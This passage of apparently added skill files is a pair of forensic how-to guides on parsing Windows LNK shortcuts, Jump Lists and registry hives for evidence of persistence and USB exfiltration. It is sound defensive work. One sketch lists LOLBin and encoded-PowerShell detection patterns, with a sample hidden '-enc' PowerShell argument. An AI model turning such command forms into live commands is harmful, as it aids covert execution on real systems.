sha256sum /cases/case-2024-001/lnk/recent/*.lnk > /cases/case-2024-001/lnk/lnk_hashes.txt 2>/dev/null
|
||||
```
|
||||
|
||||
### Step 2: Parse LNK Files with LECmd
|
||||
|
||||
```bash
|
||||
# Using Eric Zimmerman's LECmd (Windows or via Mono)
|
||||
# Process all LNK files in a directory
|
||||
LECmd.exe -d "C:\cases\lnk\recent" --csv "C:\cases\analysis" --csvf lnk_analysis.csv
|
||||
|
||||
# Process a single LNK file with verbose output
|
||||
LECmd.exe -f "C:\cases\lnk\recent\document.pdf.lnk"
|
||||
|
||||
# Process Jump List files
|
||||
JLECmd.exe -d "C:\cases\lnk\recent" --csv "C:\cases\analysis" --csvf jumplist_analysis.csv
|
||||
|
||||
# Output includes:
|
||||
# - Source file path
|
||||
# - Target path (file that was accessed)
|
||||
# - Target creation, modification, access timestamps
|
||||
# - LNK creation and modification timestamps
|
||||
# - Working directory
|
||||
# - Command line arguments
|
||||
# - Volume serial number and label
|
||||
# - Drive type (Fixed, Removable, Network)
|
||||
# - Machine ID (NetBIOS name)
|
||||
# - MAC address (from the distributed link tracker data block)
|
||||
# - File size of target
|
||||
```
|
||||
|
||||
### Step 3: Parse LNK Files with Python
|
||||
|
||||
```bash
|
||||
pip install LnkParse3
|
||||
|
||||
python3 << 'PYEOF'
import csv
import os

import LnkParse3

lnk_dir = '/cases/case-2024-001/lnk/recent/'
out_csv = '/cases/case-2024-001/analysis/lnk_analysis.csv'
fieldnames = [
    'lnk_file', 'target_path', 'working_dir', 'arguments',
    'target_created', 'target_modified', 'target_accessed', 'file_size',
    'drive_type', 'volume_serial', 'volume_label', 'machine_id', 'mac_address',
]
results = []

for filename in sorted(os.listdir(lnk_dir)):
    if not filename.lower().endswith('.lnk'):
        continue

    filepath = os.path.join(lnk_dir, filename)
    try:
        with open(filepath, 'rb') as f:
            lnk = LnkParse3.lnk_file(f)
            info = lnk.get_json()

        parsed = dict.fromkeys(fieldnames, '')
        parsed['lnk_file'] = filename

        # Extract header timestamps (these describe the target file)
        header = info.get('header') or {}
        parsed['target_created'] = str(header.get('creation_time', ''))
        parsed['target_modified'] = str(header.get('modified_time', ''))
        parsed['target_accessed'] = str(header.get('accessed_time', ''))
        parsed['file_size'] = str(header.get('file_size', ''))

        # Extract link info.
        # NOTE: key names are an assumption about LnkParse3's get_json() layout;
        # each lookup falls back to the name used originally. Verify against
        # the output of your installed version.
        link_info = info.get('link_info') or {}
        location = link_info.get('location_info') or {}
        local_path = link_info.get('local_base_path', '')
        network_path = (location.get('net_name')
                        or (link_info.get('common_network_relative_link') or {}).get('net_name', ''))
        parsed['target_path'] = local_path or network_path

        vol_info = link_info.get('volume_id') or location
        parsed['drive_type'] = str(vol_info.get('drive_type', ''))
        parsed['volume_serial'] = str(vol_info.get('drive_serial_number', ''))
        parsed['volume_label'] = str(vol_info.get('volume_label', ''))

        # Extract string data
        string_data = info.get('data') or info.get('string_data') or {}
        parsed['working_dir'] = str(string_data.get('working_directory',
                                                    string_data.get('working_dir', '')))
        parsed['arguments'] = str(string_data.get('command_line_arguments', ''))

        # Extract tracker data (machine ID and MAC)
        extra = info.get('extra') or {}
        tracker = extra.get('DISTRIBUTED_LINK_TRACKER_BLOCK') or {}
        parsed['machine_id'] = str(tracker.get('machine_identifier',
                                               tracker.get('machine_id', '')))
        # Stays empty if the parser exposes no 'mac_address' key
        parsed['mac_address'] = str(tracker.get('mac_address', ''))

        results.append(parsed)

        # Print summary
        print(f"\n{filename}")
        print(f"  Target: {parsed['target_path']}")
        print(f"  Modified: {parsed['target_modified']}")
        print(f"  Drive: {parsed['drive_type']} (Serial: {parsed['volume_serial']})")
        if parsed['machine_id']:
            print(f"  Machine: {parsed['machine_id']}")

    except Exception as e:
        print(f"  Error parsing {filename}: {e}")

# Write results to CSV (the header is written even when nothing parsed)
os.makedirs(os.path.dirname(out_csv), exist_ok=True)
with open(out_csv, 'w', newline='') as f:
    writer = csv.DictWriter(f, fieldnames=fieldnames)
    writer.writeheader()
    writer.writerows(results)

print(f"\n\nTotal LNK files parsed: {len(results)}")
PYEOF
|
||||
```
|
||||
|
||||
### Step 4: Analyze for Investigative Value
|
||||
|
||||
```bash
|
||||
# Identify files accessed from removable media
|
||||
python3 << 'PYEOF'
import csv

removable = []
network = []

# Read every row while the file is still open
with open('/cases/case-2024-001/analysis/lnk_analysis.csv', newline='') as f:
    for row in csv.DictReader(f):
        drive_type = row.get('drive_type', '').lower()
        if 'removable' in drive_type:
            removable.append(row)
        if 'network' in drive_type or row.get('target_path', '').startswith('\\\\'):
            network.append(row)

print("=== FILES ACCESSED FROM REMOVABLE MEDIA ===\n")
for row in removable:
    print(f"  {row['target_modified']} | {row['target_path']} | Vol: {row['volume_serial']}")

print("\n=== FILES ACCESSED FROM NETWORK SHARES ===\n")
for row in network:
    print(f"  {row['target_modified']} | {row['target_path']}")

print(f"\nRemovable media files: {len(removable)}")
print(f"Network share files: {len(network)}")

# Check for unique machines (tracker data)
machines = {row['machine_id'] for row in [*removable, *network] if row.get('machine_id')}
if machines:
    print(f"\nMachine IDs found: {machines}")
PYEOF
|
||||
|
||||
# Check Startup folder LNK files for persistence
|
||||
echo "=== STARTUP FOLDER SHORTCUTS (PERSISTENCE) ===" > /cases/case-2024-001/analysis/startup_persistence.txt
|
||||
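for lnk in /cases/case-2024-001/lnk/startup/*.lnk; do
    [ -e "$lnk" ] || continue   # skip when the glob matches nothing
    python3 - "$lnk" << 'PYEOF' >> /cases/case-2024-001/analysis/startup_persistence.txt 2>/dev/null
import os
import sys

import LnkParse3

# The path is passed as an argument so quotes or spaces in it cannot break the script
path = sys.argv[1]
with open(path, 'rb') as f:
    info = LnkParse3.lnk_file(f).get_json()
target = (info.get('link_info') or {}).get('local_base_path', 'Unknown')
# Looks under 'data' first, falling back to 'string_data'; verify the key
# name against your installed LnkParse3 version
strings = info.get('data') or info.get('string_data') or {}
args = strings.get('command_line_arguments', '')
print(f'  {os.path.basename(path)}: {target} {args}')
PYEOF
done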
|
||||
```
|
||||
|
||||
## Key Concepts
|
||||
|
||||
| Concept | Description |
|---------|-------------|
| Shell Link (.lnk) | Windows shortcut file format containing target path, timestamps, and metadata |
| Target timestamps | Creation, modification, and access times of the file the shortcut points to, as recorded when the LNK file was created or last updated |
| Volume serial number | Serial number assigned to a volume when it is formatted; identifies the drive where the target file resides |
| Machine ID | NetBIOS name embedded by the Distributed Link Tracking service |
| MAC address | Network adapter MAC from the machine that created the LNK file, embedded in the tracker data |
| Jump Lists | Recent and pinned file lists per application (contain embedded LNK data) |
| Automatic Destinations | System-managed Jump List entries for recently opened files |
| Custom Destinations | User-pinned Jump List items that persist until manually removed |
||||
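The MAC address concept above can be illustrated with a short sketch. It assumes the tracker block's file identifier is available as a UUID string and that it is a version-1 UUID, whose `node` field carries the 48-bit hardware address. The function name `mac_from_droid` and the sample identifier are hypothetical and used only for illustration.

```python
import uuid


def mac_from_droid(droid_file_identifier):
    """Return the node field of a version-1 UUID as a MAC string, else None."""
    try:
        parsed = uuid.UUID(droid_file_identifier)
    except (ValueError, AttributeError, TypeError):
        return None
    # Only version-1 (time-based) UUIDs carry a node field derived from hardware
    if parsed.version != 1:
        return None
    node = parsed.node
    return ":".join(f"{(node >> shift) & 0xFF:02X}" for shift in range(40, -8, -8))


# Hypothetical identifier, not taken from any real case
print(mac_from_droid("c1f2a3b4-5d6e-11ee-8c99-0242ac120002"))
```

A value recovered this way should be treated as a lead to corroborate, since a version-1 UUID may use a randomly generated node instead of a real adapter address.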
|
||||
## Tools & Systems
|
||||
|
||||
| Tool | Purpose |
|------|---------|
| LECmd | Eric Zimmerman command-line LNK file parser with CSV/JSON output |
| JLECmd | Eric Zimmerman Jump List parser |
| LnkParse3 | Python library for programmatic LNK file analysis |
| lnk_parser | Alternative Python LNK parsing tool |
| Autopsy | Forensic platform with LNK file analysis module |
| KAPE | Automated LNK and Jump List artifact collection |
| Plaso | Timeline tool with LNK file parser for super-timeline creation |
| LNK Explorer | GUI tool for interactive LNK file examination |
||||
|
||||
## Common Scenarios
|
||||
|
||||
**Scenario 1: Data Exfiltration via USB Drive**
|
||||
Analyze Recent folder LNK files for targets on removable drives, correlate their volume serial numbers with USBSTOR registry entries, build a list of the documents opened from each USB device, and correlate the access times with file copy timestamps.
|
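As a rough sketch of the grouping step in Scenario 1, the snippet below reads rows shaped like the `lnk_analysis.csv` output and groups removable-media targets by volume serial. The sample rows, the serial values, and the helper name `group_by_volume` are made up for illustration; only the column names come from the workflow above.

```python
import csv
import io
from collections import defaultdict

# Hypothetical rows using the same column names as lnk_analysis.csv
SAMPLE_CSV = r"""lnk_file,target_path,target_modified,drive_type,volume_serial
report.lnk,E:\Confidential\financial_report.xlsx,2024-01-15 14:32:00,DRIVE_REMOVABLE,0x1234abcd
notes.lnk,C:\Users\suspect_user\notes.txt,2024-01-14 09:10:00,DRIVE_FIXED,0x0a0b0c0d
db.lnk,E:\Confidential\customer_database.csv,2024-01-15 14:45:00,DRIVE_REMOVABLE,0x1234abcd
photo.lnk,F:\DCIM\img001.jpg,2024-01-16 08:00:00,DRIVE_REMOVABLE,0x9f00beef
"""


def group_by_volume(rows):
    """Group removable-media rows by volume serial, oldest target first."""
    groups = defaultdict(list)
    for row in rows:
        if "removable" in row.get("drive_type", "").lower():
            groups[row.get("volume_serial", "")].append(row)
    for items in groups.values():
        items.sort(key=lambda r: r.get("target_modified", ""))
    return dict(groups)


rows = list(csv.DictReader(io.StringIO(SAMPLE_CSV)))
by_volume = group_by_volume(rows)
for serial, items in by_volume.items():
    print(f"Volume {serial}: {len(items)} file(s)")
    for item in items:
        print(f"  {item['target_modified']}  {item['target_path']}")
```

Each serial in the result is then a candidate to match against a specific device from the USBSTOR analysis.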
||||
|
||||
**Scenario 2: Malware Persistence via Startup Shortcuts**
|
||||
Examine Startup folder LNK files for malicious targets, check target path and arguments for encoded commands or suspicious executables, verify target file exists and examine it, correlate creation timestamp with initial compromise time.
|
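The checks in Scenario 2 could be partly automated with a few heuristics, sketched below. The patterns and the function name `flag_shortcut` are illustrative assumptions, not a vetted detection rule set; they will miss real threats and flag benign shortcuts, so every hit still needs manual review.

```python
import re

# Illustrative, non-exhaustive heuristics (assumptions, tune per environment)
SUSPICIOUS_PATTERNS = {
    "script host or LOLBin": re.compile(
        r"\b(powershell|pwsh|cmd|wscript|cscript|mshta|rundll32|regsvr32)(\.exe)?\b",
        re.IGNORECASE,
    ),
    "encoded command flag": re.compile(
        r"(^|\s)-(e|ec|enc|encodedcommand)\s", re.IGNORECASE
    ),
    "user-writable path": re.compile(
        r"\\(appdata|temp|programdata|users\\public)\\", re.IGNORECASE
    ),
}


def flag_shortcut(target, arguments=""):
    """Return the names of all heuristics matched by a shortcut's target and arguments."""
    text = f"{target} {arguments}"
    return [name for name, pattern in SUSPICIOUS_PATTERNS.items() if pattern.search(text)]


# Hypothetical shortcuts for illustration
print(flag_shortcut(r"C:\ProgramData\svc\updater.exe"))
print(flag_shortcut(
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "-w hidden -enc SQBFAFgA",
))
print(flag_shortcut(r"C:\Program Files\Microsoft OneDrive\OneDrive.exe"))
```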
||||
|
||||
**Scenario 3: Network Share Access Investigation**
|
||||
Filter LNK files with network paths (UNC targets), identify which network shares were accessed and when, correlate machine IDs with known corporate systems, check if sensitive file servers were accessed outside of normal duties, build access timeline for compliance investigation.
|
||||
|
||||
**Scenario 4: Document Access Timeline for Legal Proceedings**
|
||||
Extract all Recent folder LNK files, build a chronological list of documents accessed by the user, identify specific files relevant to the case, present the LNK files' own creation and modification times (typically the first and last time the target was opened) alongside the embedded target timestamps, and correlate with email and communication timelines.
|
||||
|
||||
## Output Format
|
||||
|
||||
```
|
||||
LNK File Analysis Summary:
|
||||
User Profile: suspect_user
|
||||
Total LNK Files: 234 (Recent: 198, Desktop: 23, Startup: 5, Other: 8)
|
||||
|
||||
File Access Statistics:
|
||||
Local drive (C:): 156 files
|
||||
Removable media: 23 files (3 unique volume serials)
|
||||
Network shares: 15 files (\\server01, \\fileserver)
|
||||
Other drives: 4 files
|
||||
|
||||
Machine IDs Found: DESKTOP-ABC123, LAPTOP-XYZ789
|
||||
MAC Addresses: AA:BB:CC:DD:EE:FF, 11:22:33:44:55:66
|
||||
|
||||
Removable Media Access:
|
||||
Volume Serial 1234-ABCD:
|
||||
2024-01-15 14:32 - E:\Confidential\financial_report.xlsx
|
||||
2024-01-15 14:45 - E:\Confidential\customer_database.csv
|
||||
2024-01-15 15:00 - E:\Projects\source_code.zip
|
||||
|
||||
Startup Persistence:
|
||||
updater.lnk -> C:\ProgramData\svc\updater.exe (SUSPICIOUS)
|
||||
OneDrive.lnk -> C:\Users\...\OneDrive.exe (Legitimate)
|
||||
|
||||
Timeline: /cases/case-2024-001/analysis/lnk_analysis.csv
|
||||
```
|
||||
@@ -0,0 +1,281 @@
|
||||
---
|
||||
name: analyzing-windows-registry-for-artifacts
|
||||
description: Extract and analyze Windows Registry hives to uncover user activity, installed software, autostart entries, and evidence of system compromise.
|
||||
domain: cybersecurity
|
||||
subdomain: digital-forensics
|
||||
tags: [forensics, windows-registry, artifact-analysis, regripper, registry-explorer, evidence-collection]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
|
||||
# Analyzing Windows Registry for Artifacts
|
||||
|
||||
## When to Use
|
||||
- When investigating user activity on a Windows system during an incident
|
||||
- For identifying autorun/persistence mechanisms used by malware
|
||||
- When tracing installed software, USB devices, and network connections
|
||||
- During insider threat investigations to reconstruct user actions
|
||||
- For correlating registry timestamps with other forensic artifacts
|
||||
|
||||
## Prerequisites
|
||||
- Forensic image or extracted registry hive files
|
||||
- RegRipper, Registry Explorer (Eric Zimmerman), or python-registry
|
||||
- Access to registry hive locations (SAM, SYSTEM, SOFTWARE, NTUSER.DAT, UsrClass.dat)
|
||||
- Understanding of Windows Registry structure (hives, keys, values)
|
||||
- SIFT Workstation or forensic analysis environment
|
||||
|
||||
## Workflow
|
||||
|
||||
### Step 1: Extract Registry Hives from the Forensic Image
|
||||
|
||||
```bash
|
||||
# Mount the forensic image read-only
|
||||
mkdir -p /mnt/evidence /cases/case-2024-001/registry/logs
|
||||
mount -o ro,loop,offset=$((2048*512)) /cases/case-2024-001/images/evidence.dd /mnt/evidence
|
||||
|
||||
# Copy system registry hives
|
||||
cp /mnt/evidence/Windows/System32/config/SAM /cases/case-2024-001/registry/
|
||||
cp /mnt/evidence/Windows/System32/config/SYSTEM /cases/case-2024-001/registry/
|
||||
cp /mnt/evidence/Windows/System32/config/SOFTWARE /cases/case-2024-001/registry/
|
||||
cp /mnt/evidence/Windows/System32/config/SECURITY /cases/case-2024-001/registry/
|
||||
cp /mnt/evidence/Windows/System32/config/DEFAULT /cases/case-2024-001/registry/
|
||||
|
||||
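# Copy user-specific hives (with more than one profile, copy each user's hives to a per-user directory so same-named files do not collide)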
|
||||
cp /mnt/evidence/Users/*/NTUSER.DAT /cases/case-2024-001/registry/
|
||||
cp /mnt/evidence/Users/*/AppData/Local/Microsoft/Windows/UsrClass.dat /cases/case-2024-001/registry/
|
||||
|
||||
# Copy transaction logs (for dirty hive recovery)
|
||||
cp /mnt/evidence/Windows/System32/config/*.LOG* /cases/case-2024-001/registry/logs/
|
||||
|
||||
# Hash all extracted hives
|
||||
sha256sum /cases/case-2024-001/registry/* > /cases/case-2024-001/registry/hive_hashes.txt
|
||||
```
|
||||
|
||||
### Step 2: Analyze with RegRipper for Automated Artifact Extraction
|
||||
|
||||
```bash
|
||||
# Install RegRipper
|
||||
git clone https://github.com/keydet89/RegRipper3.0.git /opt/regripper
|
||||
|
||||
# Run RegRipper against NTUSER.DAT (user profile)
|
||||
perl /opt/regripper/rip.pl -r /cases/case-2024-001/registry/NTUSER.DAT \
|
||||
-f ntuser > /cases/case-2024-001/analysis/ntuser_report.txt
|
||||
|
||||
# Run against SYSTEM hive
|
||||
perl /opt/regripper/rip.pl -r /cases/case-2024-001/registry/SYSTEM \
|
||||
-f system > /cases/case-2024-001/analysis/system_report.txt
|
||||
|
||||
# Run against SOFTWARE hive
|
||||
perl /opt/regripper/rip.pl -r /cases/case-2024-001/registry/SOFTWARE \
|
||||
-f software > /cases/case-2024-001/analysis/software_report.txt
|
||||
|
||||
# Run against SAM hive (user accounts)
|
||||
perl /opt/regripper/rip.pl -r /cases/case-2024-001/registry/SAM \
|
||||
-f sam > /cases/case-2024-001/analysis/sam_report.txt
|
||||
|
||||
# Run specific plugins
|
||||
perl /opt/regripper/rip.pl -r /cases/case-2024-001/registry/NTUSER.DAT \
|
||||
-p userassist > /cases/case-2024-001/analysis/userassist.txt
|
||||
|
||||
perl /opt/regripper/rip.pl -r /cases/case-2024-001/registry/SYSTEM \
|
||||
-p usbstor > /cases/case-2024-001/analysis/usbstor.txt
|
||||
```
|
||||
|
||||
### Step 3: Extract Persistence and Autorun Entries
|
||||
|
||||
```bash
|
||||
# Using python-registry for targeted extraction
|
||||
pip install python-registry
|
||||
|
||||
python3 << 'PYEOF'
from Registry import Registry

# Open SOFTWARE hive
reg = Registry.Registry("/cases/case-2024-001/registry/SOFTWARE")

# Check Run keys (autostart)
autorun_paths = [
    "Microsoft\\Windows\\CurrentVersion\\Run",
    "Microsoft\\Windows\\CurrentVersion\\RunOnce",
    "Microsoft\\Windows\\CurrentVersion\\RunServices",
    "Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run",
    "Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run",
]

for path in autorun_paths:
    try:
        key = reg.open(path)
    except Registry.RegistryKeyNotFoundException:
        continue
    print(f"\n=== {path} (Last Modified: {key.timestamp()}) ===")
    for value in key.values():
        print(f"  {value.name()}: {value.value()}")

# List svchost service groups (the service definitions themselves live in
# the SYSTEM hive under ControlSet00x\Services)
try:
    key = reg.open("Microsoft\\Windows NT\\CurrentVersion\\Svchost")
    print("\n=== Svchost Groups ===")
    for value in key.values():
        print(f"  {value.name()}: {value.value()}")
except Registry.RegistryKeyNotFoundException:
    pass
PYEOF
|
||||
|
||||
# Check NTUSER.DAT for user-specific autorun
|
||||
python3 << 'PYEOF'
from Registry import Registry

reg = Registry.Registry("/cases/case-2024-001/registry/NTUSER.DAT")

user_autorun = [
    "Software\\Microsoft\\Windows\\CurrentVersion\\Run",
    "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce",
    "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\StartupApproved\\Run",
]

for path in user_autorun:
    try:
        key = reg.open(path)
        print(f"\n=== {path} (Last Modified: {key.timestamp()}) ===")
        for value in key.values():
            print(f"  {value.name()}: {value.value()}")
    except Registry.RegistryKeyNotFoundException:
        pass
PYEOF
|
||||
```
|
||||
|
||||
### Step 4: Analyze User Activity Artifacts
|
||||
|
||||
```bash
|
||||
# Extract UserAssist data (program execution history with ROT13 encoding)
|
||||
python3 << 'PYEOF'
from Registry import Registry
import codecs, struct, datetime

reg = Registry.Registry("/cases/case-2024-001/registry/NTUSER.DAT")

ua_path = "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist"
key = reg.open(ua_path)

for guid_key in key.subkeys():
    try:
        count_key = guid_key.subkey("Count")
    except Registry.RegistryKeyNotFoundException:
        continue  # GUID key without a Count subkey
    print(f"\n=== {guid_key.name()} ===")
    for value in count_key.values():
        # Value names are ROT13-encoded program paths
        decoded_name = codecs.decode(value.name(), 'rot_13')
        data = value.value()
        if len(data) >= 16:
            run_count = struct.unpack('<I', data[4:8])[0]
            focus_count = struct.unpack('<I', data[8:12])[0]
            # Last-run FILETIME (UTC) sits at offset 60 in the 72-byte record layout
            timestamp = struct.unpack('<Q', data[60:68])[0] if len(data) >= 68 else 0
            if timestamp > 0:
                ts = datetime.datetime(1601, 1, 1) + datetime.timedelta(microseconds=timestamp // 10)
                print(f"  {decoded_name}: Runs={run_count}, Focus={focus_count}, Last={ts}")
            else:
                print(f"  {decoded_name}: Runs={run_count}, Focus={focus_count}")
PYEOF
|
||||
|
||||
# Extract Recent Documents (MRU lists)
|
||||
perl /opt/regripper/rip.pl -r /cases/case-2024-001/registry/NTUSER.DAT \
|
||||
-p recentdocs > /cases/case-2024-001/analysis/recentdocs.txt
|
||||
|
||||
# Extract typed URLs (browser)
|
||||
perl /opt/regripper/rip.pl -r /cases/case-2024-001/registry/NTUSER.DAT \
|
||||
-p typedurls > /cases/case-2024-001/analysis/typedurls.txt
|
||||
|
||||
# Extract typed paths in Explorer
|
||||
perl /opt/regripper/rip.pl -r /cases/case-2024-001/registry/NTUSER.DAT \
|
||||
-p typedpaths > /cases/case-2024-001/analysis/typedpaths.txt
|
||||
```
|
||||
|
||||
### Step 5: Extract System and Network Information
|
||||
|
||||
```bash
|
||||
# Computer name from SYSTEM hive (OS version details are stored in the SOFTWARE hive)
|
||||
perl /opt/regripper/rip.pl -r /cases/case-2024-001/registry/SYSTEM \
|
||||
-p compname > /cases/case-2024-001/analysis/system_info.txt
|
||||
|
||||
# Network interfaces and configuration
|
||||
perl /opt/regripper/rip.pl -r /cases/case-2024-001/registry/SYSTEM \
|
||||
-p nic2 >> /cases/case-2024-001/analysis/system_info.txt
|
||||
|
||||
# Network history (wired and wireless network profiles)
|
||||
perl /opt/regripper/rip.pl -r /cases/case-2024-001/registry/SOFTWARE \
|
||||
-p networklist > /cases/case-2024-001/analysis/network_history.txt
|
||||
|
||||
# Timezone configuration
|
||||
perl /opt/regripper/rip.pl -r /cases/case-2024-001/registry/SYSTEM \
|
||||
-p timezone > /cases/case-2024-001/analysis/timezone.txt
|
||||
|
||||
# Shutdown time
|
||||
perl /opt/regripper/rip.pl -r /cases/case-2024-001/registry/SYSTEM \
|
||||
-p shutdown > /cases/case-2024-001/analysis/shutdown.txt
|
||||
|
||||
# Installed software from Uninstall keys
|
||||
perl /opt/regripper/rip.pl -r /cases/case-2024-001/registry/SOFTWARE \
|
||||
-p uninstall > /cases/case-2024-001/analysis/installed_software.txt
|
||||
```
|
||||
|
||||
## Key Concepts
|
||||
|
||||
| Concept | Description |
|---------|-------------|
| Registry hive | Binary file storing a section of the registry (SAM, SYSTEM, SOFTWARE, NTUSER.DAT) |
| MRU (Most Recently Used) | Lists tracking recently accessed files, commands, and search terms |
| UserAssist | ROT13-encoded registry entries tracking program execution with timestamps |
| ShimCache | Application compatibility cache recording executed programs |
| AmCache | Detailed execution history including SHA-1 hashes of executables |
| BAM/DAM | Background/Desktop Activity Moderator tracking program execution in Win10+ |
| Last Write Time | Timestamp on registry keys indicating when they were last modified |
| Transaction logs | Journal files allowing recovery of registry state after improper shutdown |
||||
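Two of the concepts above, ROT13-encoded UserAssist names and FILETIME-based timestamps, can be shown in a minimal standalone sketch. The helper names are hypothetical; the sample inputs are a commonly seen UserAssist value name and the FILETIME value that corresponds to the Unix epoch.

```python
import codecs
from datetime import datetime, timedelta, timezone

# FILETIME counts 100-nanosecond intervals since 1601-01-01 UTC
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(filetime):
    """Convert a Windows FILETIME integer to a timezone-aware UTC datetime."""
    return FILETIME_EPOCH + timedelta(microseconds=filetime // 10)


def decode_userassist_name(name):
    """Decode a ROT13-encoded UserAssist value name."""
    return codecs.decode(name, "rot_13")


print(decode_userassist_name("HRZR_PGYFRFFVBA"))
print(filetime_to_datetime(116444736000000000))
```

Keeping the result timezone-aware makes it harder to mix UTC registry times with local-time artifacts when building a timeline.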
|
||||
## Tools & Systems
|
||||
|
||||
| Tool | Purpose |
|------|---------|
| RegRipper | Automated registry artifact extraction with plugin architecture |
| Registry Explorer | Eric Zimmerman GUI tool for interactive registry analysis |
| python-registry | Python library for programmatic registry hive parsing |
| RECmd | Eric Zimmerman command-line registry analysis tool |
| yarp | Yet Another Registry Parser for Python-based analysis |
| AppCompatCacheParser | Dedicated ShimCache/AppCompatCache parser |
| AmcacheParser | Dedicated AmCache.hve analysis tool |
| ShellBags Explorer | Specialized tool for analyzing ShellBag artifacts |
||||
|
||||
## Common Scenarios
|
||||
|
||||
**Scenario 1: Malware Persistence Investigation**
|
||||
Extract SOFTWARE and NTUSER.DAT hives, check all Run/RunOnce keys for unauthorized entries, examine services for suspicious additions, check scheduled tasks registry keys, correlate autorun timestamps with malware execution timeline.
|
||||
|
||||
**Scenario 2: User Activity Reconstruction**
|
||||
Analyze UserAssist for program execution history, examine RecentDocs for accessed files, check TypedPaths for Explorer navigation, extract ShellBags for folder access patterns, build a timeline of user activity around the incident window.
|
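The last step of Scenario 2, building a timeline around the incident window, might look like the sketch below. It assumes events from the different artifacts have already been normalized into `(timestamp, source, description)` tuples; the function name `build_timeline` and the sample events are hypothetical.

```python
from datetime import datetime, timedelta


def build_timeline(events, incident_time, window_hours=24):
    """Return events within +/- window_hours of incident_time, oldest first."""
    window = timedelta(hours=window_hours)
    start, end = incident_time - window, incident_time + window
    in_window = [event for event in events if start <= event[0] <= end]
    return sorted(in_window, key=lambda event: event[0])


# Hypothetical normalized events (timestamp, artifact source, description)
events = [
    (datetime(2024, 1, 18, 22, 5), "UserAssist", "cmd.exe executed"),
    (datetime(2024, 1, 10, 9, 0), "RecentDocs", "budget.xlsx opened"),
    (datetime(2024, 1, 18, 21, 40), "TypedPaths", r"\\fileserver\finance typed"),
]
incident = datetime(2024, 1, 18, 22, 0)

timeline = build_timeline(events, incident, window_hours=6)
for when, source, what in timeline:
    print(f"{when:%Y-%m-%d %H:%M}  [{source}] {what}")
```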
||||
|
||||
**Scenario 3: Unauthorized Software Detection**
|
||||
Parse Uninstall keys for all installed applications, compare against approved software baseline, check BAM/DAM for recently executed programs not in approved list, examine AppCompatCache for execution evidence even after uninstallation.
|
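The baseline comparison in Scenario 3 reduces to a set difference once names are normalized. The sketch below assumes the installed application names were already parsed from the Uninstall keys; the function name `find_unapproved` and both lists are illustrative placeholders.

```python
def find_unapproved(installed, approved):
    """Return installed application names that are absent from the approved baseline."""
    approved_norm = {name.strip().casefold() for name in approved}
    unapproved = {
        name.strip()
        for name in installed
        if name.strip() and name.strip().casefold() not in approved_norm
    }
    return sorted(unapproved, key=str.casefold)


# Hypothetical inputs for illustration
installed = ["7-Zip 23.01", "Google Chrome", "AnyDesk", "google chrome ", "TeamViewer"]
approved = ["7-Zip 23.01", "Google Chrome"]

print(find_unapproved(installed, approved))
```

Exact-name matching is a deliberate simplification; display names with embedded version strings would need looser matching in practice.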
||||
|
||||
**Scenario 4: USB Data Exfiltration Investigation**
|
||||
Extract USBSTOR entries from SYSTEM hive for connected devices, correlate device serial numbers with MountedDevices, check NTUSER.DAT MountPoints2 for user access to removable media, examine SetupAPI logs for first-connection timestamps.
|
||||
|
||||
## Output Format
|
||||
|
||||
```
|
||||
Registry Analysis Summary:
|
||||
System: DESKTOP-ABC123 (Windows 10 Pro Build 19041)
|
||||
Timezone: Eastern Standard Time (UTC-5)
|
||||
Last Shutdown: 2024-01-18 23:45:12 UTC
|
||||
|
||||
Autorun Entries:
|
||||
HKLM Run: 5 entries (1 suspicious: "updater.exe" -> C:\ProgramData\svc\updater.exe)
|
||||
HKCU Run: 3 entries (all legitimate)
|
||||
Services: 142 entries (2 unknown: "WinDefSvc", "SysMonAgent")
|
||||
|
||||
User Activity (NTUSER.DAT):
|
||||
UserAssist Programs: 234 entries
|
||||
Recent Documents: 89 entries
|
||||
Typed URLs: 45 entries
|
||||
Typed Paths: 12 entries
|
||||
|
||||
USB Devices Connected:
|
||||
- Kingston DataTraveler (Serial: 0019E06B4521) - First: 2024-01-10, Last: 2024-01-18
|
||||
- WD My Passport (Serial: 575834314131) - First: 2024-01-15, Last: 2024-01-15
|
||||
|
||||
Installed Software: 127 applications
|
||||
Suspicious Findings: 3 items flagged for review
|
||||
```
|
||||